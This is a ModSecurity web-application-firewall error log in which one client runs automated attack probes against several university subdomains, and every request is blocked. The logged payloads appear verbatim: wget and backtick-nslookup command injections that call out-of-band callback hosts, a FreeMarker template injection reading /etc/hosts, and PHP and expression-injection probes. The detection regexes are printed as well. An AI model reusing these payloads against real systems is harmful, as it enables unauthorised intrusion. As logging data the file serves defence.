[Tue Aug 29 11:31:56.358910 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vMCo-f0AAAQMrxwAAAAu"]
[Tue Aug 29 11:31:56.359837 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlgktpgkb3zh4amb.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAQV4RIAAAA3"]
[Tue Aug 29 11:31:56.372176 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vMCo-f0AAAQR49UAAAAz"]
[Tue Aug 29 11:31:56.373527 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlgfwy3zom8jchay.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAPiBnkAAAAB"]
[Tue Aug 29 11:31:56.379088 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlg4zd1pwuengur5.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAPDn-4AAAAP"]
[Tue Aug 29 11:31:56.382247 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlg5d6zmhnqsz7z6.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAP6NRIAAAAQ"]
[Tue Aug 29 11:31:56.415168 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlg5chyidr6corrb.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAQMrx4AAAAu"]
[Tue Aug 29 11:31:57.327922 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vcCo-f0AAAPiBn4AAAAB"]
[Tue Aug 29 11:31:57.336514 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vcCo-f0AAAP5mM8AAAAM"]
[Tue Aug 29 11:31:57.337711 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vcCo-f0AAAQkBZ0AAAAC"]
[Tue Aug 29 11:31:57.351467 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vcCo-f0AAAPiBn8AAAAB"]
[Tue Aug 29 11:31:57.376995 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vcCo-f0AAAQOv48AAAAw"]
[Tue Aug 29 11:31:57.394693 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlg65dcqfmr9i4mh.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vcCo-f0AAANsAWkAAAAD"]
[Tue Aug 29 11:31:57.423231 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vcCo-f0AAAPiBoIAAAAB"]
[Tue Aug 29 11:31:58.303544 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAQV4RoAAAA3"]
[Tue Aug 29 11:31:58.305746 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAQnF6oAAAAF"]
[Tue Aug 29 11:31:58.308773 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAQMryYAAAAu"]
[Tue Aug 29 11:31:58.309684 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAPiBoQAAAAB"]
[Tue Aug 29 11:31:58.346119 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10vsCo-f0AAAQR4@AAAAAz"]
[Tue Aug 29 11:31:58.357181 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vsCo-f0AAAQNwLQAAAAv"]
[Tue Aug 29 11:31:58.358995 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10vsCo-f0AAAQMrygAAAAu"]
[Tue Aug 29 11:31:58.365571 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10vsCo-f0AAAQR4@EAAAAz"]
[Tue Aug 29 11:31:58.368453 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10vsCo-f0AAAPDoAoAAAAP"]
[Tue Aug 29 11:31:58.375398 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10vsCo-f0AAAP8G2sAAAAV"]
[Tue Aug 29 11:31:58.396672 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10vsCo-f0AAAQNwLYAAAAv"]
[Tue Aug 29 11:31:58.398905 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10vsCo-f0AAAQJWzUAAAAr"]
[Tue Aug 29 11:31:58.417470 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAQNwLcAAAAv"]
[Tue Aug 29 11:31:58.420157 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vsCo-f0AAAPDoAwAAAAP"]
[Tue Aug 29 11:31:58.429070 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10vsCo-f0AAAQnF68AAAAF"]
[Tue Aug 29 11:31:59.317219 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlgj7e13oakp7ro5.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAQNwLgAAAAv"]
